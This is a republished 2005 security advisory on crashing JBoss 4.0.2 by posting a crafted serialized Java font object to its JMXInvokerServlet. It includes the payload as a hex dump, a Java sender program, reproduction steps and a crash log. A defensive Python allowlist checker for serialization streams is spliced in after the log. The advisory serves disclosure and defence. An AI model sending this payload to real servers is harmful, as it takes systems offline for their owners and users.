Remotely DoSing JBoss 4.0.2 with serialized java objects

2005.11.05
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

=+=============================================================
Remotely DoSing JBoss 4.0.2 with serialized java objects
Implications of serialisation vulnerabilities in the JDK
=+=============================================================
Author: Marc Schoenefeld, illegalaccess.org
        marc/at/illegalaccess.org
=+=============================================================
Date: November 4, 2005
=+=============================================================

As I had the chance to demonstrate at HackInTheBox 2005, JDK 1.4.2 is
vulnerable to a font deserialization bug. This can be used to crash the
default installation of every version of the JBoss application server on
Win32, up to the current 4.0.2 version.

JBoss offers the possibility of invoking JMX methods with the URL:

  http://host:8080/invoker/JMXInvokerServlet

I fuzzed several values in the GRAY.pf font file and created a serialized
font object from it (a java.awt.color.ICC_ProfileGray, as the class
descriptor in the dump shows). The resulting file can be found in
[Appendix:1]. Then I wrote a small program [Appendix:2] that POSTs the
object via HTTP to /invoker/JMXInvokerServlet. The servlet's
deserialisation of the posted object crashes the underlying JDK
[Appendix:3].

To reproduce:

1) run a JBoss server in the default installation
2) un-xxd the file iccprofile.ser.xxd to iccprofile.ser
3) run InvokerUpload.java [Appendix:2] with two arguments, like
   java InvokerUpload 127.0.0.1 iccprofile.ser

There are several other vulnerable object types that can be triggered
this way from remote, e.g. several classes from rt.jar that expose this
bug also in 1.4.2_09 and 1.5.0_05, as shown in [Appendix:4] and
[Appendix:5]. Even worse, these bugs crash the JVM on all platforms
(WOCE, write once crash everywhere).

Sun has been aware of this particular bug since 7/17/05. To support the
safe release of a fix and an official advisory from Sun, I will not
disclose the serialized vulnerable versions of the affected java.lang.*
classes until a fix is released.
After my bug report Sun announced fixes in 5.0U6, 1.4.2_11 and 1.3.1_17.

It should be noted that there is no vulnerability in JBoss itself, as this
is a flaw in the JDK only. Problems in the java serialisation API are not
new, see

  http://sunsolve.sun.com/search/document.do?assetkey=1-26-57707-1

JBoss is used only for demonstration purposes, to show that a good product
may suffer from vulnerabilities in the layer below. Therefore every
architecture that feeds untrusted input to the serialisation API is
potentially affected.

Sincerely
Marc Schoenefeld

=+=============================================================
[Appendix:1] iccprofile.ser.xxd

0000000: aced 0005 7372 001e 6a61 7661 2e61 7774  ....sr..java.awt
0000010: 2e63 6f6c 6f72 2e49 4343 5f50 726f 6669  .color.ICC_Profi
0000020: 6c65 4772 6179 f064 2ff1 f299 a2a7 0200  leGray.d/.......
0000030: 0078 7200 1a6a 6176 612e 6177 742e 636f  .xr..java.awt.co
0000040: 6c6f 722e 4943 435f 5072 6f66 696c 65c9  lor.ICC_Profile.
0000050: 5794 b0cf c9ef 4203 0001 4900 1f69 6363  W.....B...I..icc
0000060: 5072 6f66 696c 6553 6572 6961 6c69 7a65  ProfileSerialize
0000070: 6444 6174 6156 6572 7369 6f6e 7870 0000  dDataVersionxp..
0000080: 0001 7075 7200 025b 42ac f317 f806 0854  ..pur..[B......T
0000090: e002 0000 7870 0000 0000 0000 0278 4b43  ....xp.......xKC
00000a0: 4d53 0200 0000 6d6e 7472 4752 4159 5859  MS....mntrGRAYXY
00000b0: 5a20 005f 0007 001b 0011 001e 000f 6163  Z ._..........ac
00000c0: 7370 5355 4e57 0000 0001 4b4f 4441 4752  spSUNW....KODAGR
00000d0: 4159 0000 0000 0000 0000 0000 0001 0000  AY..............
00000e0: f6d5 0001 0000 0000 d32b 0000 0000 0000  .........+......
00000f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000110: 0000 0000 0000 0000 0000 0000 0006 6370  ..............cp
0000120: 7274 0000 00cc 0000 003f 6465 7363 0000  rt.......?desc..
0000130: 010c 0000 0081 646d 6e64 0000 0190 0000  ......dmnd......
0000140: 0060 7774 7074 0000 01f0 0000 0014 6b54  .`wtpt........kT
0000150: 5243 0000 0204 0000 000e 646d 6464 0000  RC........dmdd..
0000160: 0214 0000 0064 7465 7874 0000 0000 434f  .....dtext....CO
0000170: 5059 5249 4748 5420 2863 2920 3139 3937  PYRIGHT (c) 1997
0000180: 2045 6173 746d 616e 204b 6f64 616b 2c20   Eastman Kodak, 
0000190: 416c 6c20 7269 6768 7473 2072 6573 6572  All rights reser
00001a0: 7665 642e 0000 6465 7363 0000 0000 0000  ved...desc......
00001b0: 0027 4b4f 4441 4b20 4772 6179 7363 616c  .'KODAK Grayscal
00001c0: 6520 436f 6e76 6572 7369 6f6e 202d 2047  e Conversion - G
00001d0: 616d 6d61 2031 2e30 0000 0000 0000 0000  amma 1.0........
00001e0: 0000 0000 0000 0000 00d8 b240 0000 0000  ...........@....
00001f0: 00ff ffff ff11 0100 00c4 087e 0000 0000  ...........~....
0000200: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000210: 00c4 087e 0000 0000 00c4 087e 000c 0000  ...~.......~....
0000220: 0001 0000 0000 0000 0000 6465 7363 0000  ..........desc..
0000230: 0000 0000 0006 4b4f 4441 4b00 0000 0000  ......KODAK.....
0000240: 0000 0000 0000 0000 0000 0000 d8b2 4000  ..............@.
0000250: 0000 0000 ffff ffff 0809 8a00 e008 8a00  ................
0000260: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000270: 0000 0000 e008 8a00 0000 0000 e008 8a00  ................
0000280: d82c 8a00 d82c 8a00 0000 5859 5a20 0000  .,...,....XYZ ..
0000290: 0000 0000 f6d5 0001 0000 0000 d32b 6375  .............+cu
00002a0: 7276 0000 0000 0000 0001 0100 0000 6465  rv............de
00002b0: 7363 0000 0000 0000 000a 4772 6179 7363  sc........Graysc
00002c0: 616c 6500 0000 0000 0000 0000 0000 0000  ale.............
00002d0: 0000 0000 d8b2 4000 0000 0000 ffff ffff  ......@.........
00002e0: 0809 8a00 e008 8a00 0000 0000 0000 0000  ................
00002f0: 0000 0000 0000 0000 0000 0000 e008 8a00  ................
0000300: 0000 0000 e008 8a00 d82c 8a00 d82c 8a00  .........,...,..
0000310: 0000 78                                  ..x

=+=============================================================
[Appendix:2]: InvokerUpload.java

import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class InvokerUpload {
    // Usage: java InvokerUpload <host> <serialized-object-file>
    public static void main(String[] a) throws Exception {
        URL url = new URL("http://" + a[0] + ":8080/invoker/JMXInvokerServlet");

        // Read the whole serialized object from the file named by the second argument.
        FileInputStream fis = new FileInputStream(a[1]);
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        byte[] chunk = new byte[4096];
        int n;
        while ((n = fis.read(chunk)) != -1) {
            buf.write(chunk, 0, n);
        }
        fis.close();
        byte[] b = buf.toByteArray();
        System.out.println(b.length + " bytes read");

        // POST the raw object bytes; the servlet deserialises the body as-is.
        HttpURLConnection con = (HttpURLConnection) url.openConnection();
        con.setDoOutput(true);
        con.connect();
        con.getOutputStream().write(b);
        con.getOutputStream().close();
        BufferedReader br = new BufferedReader(new InputStreamReader(con.getInputStream()));
        String res = br.readLine();
        System.out.println(res);

        // Deserialise the same bytes locally as well; on a vulnerable JDK this
        // crashes the client JVM in the same way.
        ByteArrayInputStream bis = new ByteArrayInputStream(b);
        ObjectInputStream ois = new ObjectInputStream(bis);
        Object o = ois.readObject();
    }
}

=+=============================================================
[Appendix:3] Crash of JBoss 4.0.2 with JDK 1.4.2_08, font object

23:36:11,359 INFO  [Server] JBoss (MX MicroKernel) [4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:359ms
An unexpected exception has been detected in native code outside the VM.
Unexpected Signal : EXCEPTION_ACCESS_VIOLATION (0xc0000005) occurred at PC=0x46F8155
Function=[Unknown.]
Library=C:java1.4.2
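The crash in Appendix 3 happens while ObjectInputStream.readObject() processes the posted object, i.e. after the stream has already named the class to instantiate; the flags byte 0x03 in the ICC_Profile descriptor shows that the class carries its own writeObject/readObject pair, which is how the attacker's byte[] reaches code the receiving JVM never asked to run. A server that cannot upgrade the JDK can still refuse such a payload before that point by walking the stream and checking every class descriptor against an allowlist, the idea the JDK later built in as ObjectInputFilter (JEP 290). The Python script below is an added example, not code from the advisory or from JBoss: it implements a minimal walker for the Java serialization stream format and runs it over the first 160 bytes of iccprofile.ser as printed in Appendix 1 (stream header and all three class descriptors; the remaining ICC profile body is left out). The allowlist is constructed for the demonstration. On these bytes the walker reports java.awt.color.ICC_ProfileGray, java.awt.color.ICC_Profile and [B, of which only [B is allowed, and stops with an error at offset 0x9a: the byte[] length field at 0x96-0x99 reads 0, so after the empty array the walker expects a type code and instead finds 0x00, the first byte of the profile's own size field 0x00000278. Whatever the native CMM then does with that data, the allowlist alone already rejects the stream.

```python
"""Look-ahead walk of a Java serialization stream: list the class descriptors it
names and reject it if any is off an allowlist, before ObjectInputStream would
instantiate anything.  Added example, not code from the advisory or JBoss."""

# Type codes and flags from the Java Object Serialization Stream Protocol.
TC_NULL, TC_REFERENCE, TC_CLASSDESC, TC_OBJECT = 0x70, 0x71, 0x72, 0x73
TC_STRING, TC_ARRAY, TC_BLOCKDATA, TC_ENDBLOCKDATA = 0x74, 0x75, 0x77, 0x78
SC_WRITE_METHOD, SC_SERIALIZABLE, BASE_WIRE_HANDLE = 0x01, 0x02, 0x7E0000
PRIM_SIZE = {"B": 1, "C": 2, "D": 8, "F": 4, "I": 4, "J": 8, "S": 2, "Z": 1}

# Bytes 0x000-0x09f of iccprofile.ser from Appendix 1: stream header, the three
# class descriptors and the start of the byte[]; the ICC body is left out here.
ICCPROFILE_SER_HEAD = bytes.fromhex(
    "aced00057372001e6a6176612e617774" "2e636f6c6f722e4943435f50726f6669"
    "6c6547726179f0642ff1f299a2a70200" "007872001a6a6176612e6177742e636f"
    "6c6f722e4943435f50726f66696c65c9" "5794b0cfc9ef4203000149001f696363"
    "50726f66696c6553657269616c697a65" "644461746156657273696f6e78700000"
    "000170757200025b42acf317f8060854" "e0020000787000000000000002784b43")
# Constructed allowlist; a real one names exactly the types the endpoint needs.
ALLOWED = {"[B", "java.lang.String"}


class StreamWalker:
    def __init__(self, data):
        self.data, self.pos = data, 0
        self.handles = []   # newHandle table: class descs, objects, strings
        self.classes = []   # class descriptor names, in stream order

    def take(self, n):
        if self.pos + n > len(self.data):
            raise ValueError("truncated at offset 0x%x" % self.pos)
        self.pos += n
        return self.data[self.pos - n:self.pos]

    def num(self, n):       # big-endian unsigned integer of n bytes
        return int.from_bytes(self.take(n), "big")

    def utf(self):
        return self.take(self.num(2)).decode("utf-8", "replace")

    def class_desc(self):
        off, tc = self.pos, self.num(1)
        if tc == TC_NULL:
            return None
        if tc == TC_REFERENCE:
            return self.handles[self.num(4) - BASE_WIRE_HANDLE]
        if tc != TC_CLASSDESC:
            raise ValueError("unexpected type code 0x%02x at offset 0x%x" % (tc, off))
        desc = {"name": self.utf(), "fields": []}
        self.take(8)                          # serialVersionUID
        desc["flags"] = self.num(1)
        self.handles.append(desc)             # handle is assigned before the fields
        self.classes.append(desc["name"])
        for _ in range(self.num(2)):
            code, _name = chr(self.num(1)), self.utf()
            if code in "L[":
                self.content()                # field type name: TC_STRING or ref
            desc["fields"].append(code)
        if self.num(1) != TC_ENDBLOCKDATA:    # class annotations are not handled
            raise ValueError("class annotation at offset 0x%x" % (self.pos - 1))
        desc["super"] = self.class_desc()
        return desc

    def content(self):      # one element: null, ref, string, block data, object, array
        off, tc = self.pos, self.num(1)
        if tc == TC_NULL:
            return None
        if tc == TC_REFERENCE:
            return self.handles[self.num(4) - BASE_WIRE_HANDLE]
        if tc == TC_STRING:
            self.handles.append(self.utf())
            return self.handles[-1]
        if tc == TC_BLOCKDATA:
            return self.take(self.num(1))
        if tc not in (TC_OBJECT, TC_ARRAY):
            raise ValueError("unexpected type code 0x%02x at offset 0x%x" % (tc, off))
        desc = self.class_desc()
        self.handles.append(desc)             # the object/array gets a handle too
        if tc == TC_OBJECT:
            self.object_data(desc)
        else:
            count, elem = self.num(4), desc["name"][1:2]
            if elem in PRIM_SIZE:
                self.take(count * PRIM_SIZE[elem])
            else:
                for _ in range(count):
                    self.content()
        return desc["name"]

    def object_data(self, desc):          # superclass data is written first
        if desc is None:
            return
        self.object_data(desc["super"])
        if not desc["flags"] & SC_SERIALIZABLE:
            raise ValueError("Externalizable %s not handled" % desc["name"])
        for code in desc["fields"]:
            self.take(PRIM_SIZE[code]) if code in PRIM_SIZE else self.content()
        if desc["flags"] & SC_WRITE_METHOD:   # custom writeObject() data follows
            while self.take(1)[0] != TC_ENDBLOCKDATA:
                self.pos -= 1
                self.content()


def inspect_stream(data, allowlist):
    """Return (classes named, classes not on the allowlist, walk error or None)."""
    w, error = StreamWalker(data), None
    try:
        if w.take(2) != b"\xac\xed" or w.num(2) != 5:
            raise ValueError("not a Java serialization stream")
        while w.pos < len(data):
            w.content()
    except (ValueError, IndexError) as exc:
        error = str(exc)
    return w.classes, [c for c in w.classes if c not in allowlist], error


if __name__ == "__main__":
    print(inspect_stream(ICCPROFILE_SER_HEAD, ALLOWED))
```

Run it on a captured POST body (or on iccprofile.ser itself) and treat a non-empty blocked list or any walk error as grounds to drop the request. In-process the same check belongs in an ObjectInputStream.resolveClass() override or an ObjectInputFilter, which sees the class name at exactly the point this walker does, before any constructor or readObject() of that class runs.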


Copyright 2024, cxsecurity.com